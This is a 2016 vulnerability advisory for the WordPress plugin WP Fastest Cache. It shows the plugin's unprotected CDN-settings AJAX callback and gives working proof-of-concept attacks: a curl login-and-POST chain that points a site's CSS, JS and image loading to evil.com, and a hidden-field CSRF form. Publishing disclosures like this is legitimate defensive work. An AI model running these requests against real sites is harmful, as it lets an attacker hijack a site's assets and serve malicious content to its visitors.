WP Fastest Cache [Unauthorized Options Update]

Description

Plugin WP Fastest Cache registers the AJAX action save_cdn_integration_ajax_request in order to provide a convenient way for admins to save options relative to their preferences on CDN integration. This action uses the wpfc_save_cdn_integration_ajax_request_callback() function which lacks capabilities or CSRF checks, thus allowing a registered user to update these options or to a malicious site perform a CSRF attack.

By overriding the CDN preferences an attacker can direct all requests for CSS files, images, videos etc. to his site allowing him to serve malicious content to users of the vulnerable site.

Vulnerable code:

file: wp-fastest-cache/wpFastestCache.php:

public function wpfc_save_cdn_integration_ajax_request_callback(){
    $values = json_encode($_POST["values"]);
    if(get_option("WpFastestCacheCDN")){
        update_option("WpFastestCacheCDN", $values);
    }else{
        add_option("WpFastestCacheCDN", $values, null, "yes");
    }
    echo json_encode(array("success" => true));
    exit;
}

PoC

Authenticated

curl -XPOST 'http://sbwp1.dev/wp-login.php' \
    -d 'log=subscriber&pwd=password&wp-submit=Log+In' \
    -c '/tmp/Pan' \
& curl -XPOST 'http://sbwp1.dev/wp-admin/admin-ajax.php' \
    -d 'action=wpfc_save_cdn_integration_ajax_request&values%5Bsuccess%5D=false&values%5Bid%5D=other&values%5Bcdnurl%5D=http%3A%2F%2Fevil.com&values%5Boriginurl%5D=http%3A%2F%2Fvuln.com&values%5Bfile_types%5D=css%2Cjs%2Cgif%2Cpng%2Cjpg%2Cjpeg%2Cttf%2Cotf%2Cwoff%2Cless%2Cmp4%2Csvg%2Ceot&file_types=css%2Cjs%2Cgif%2Cpng%2Cjpg%2Cjpeg%2Cttf%2Cotf%2Cwoff%2Cless%2Cmp4%2Csvg%2Ceot' \
    -b '/tmp/Pan'

CSRF

<form action="http://sbwp1.dev/wp-admin/admin-ajax.php" method="POST">
    <input type="hidden" name="action" value="wpfc_save_cdn_integration_ajax_request" />
    <input name="values[id]" type="hidden" value="other" >
    <input name="values[cdnurl]" type="hidden" value="cdnurl.com" >
    <input name="values[originurl]" type="hidden" value="originurl.com" >
    <input name="values[success]" type="hidden" value="true" >
    <input name="values[file_types]" type="hidden" value="css,js,gif,png,jpg,jpeg,ttf,otf,woff,less,mp4,svg,eot" >
    <input type="submit" value="Submit form" />
</form>

---

WordPress Plugins Unauthorized Options Update

---

INFO

• 26 April 2016
• Pan Vag
• www.wpfastestcache.com
• wordpress.org
• 0.8.5.6
• WordPress 4.5
• DWF-2016-87029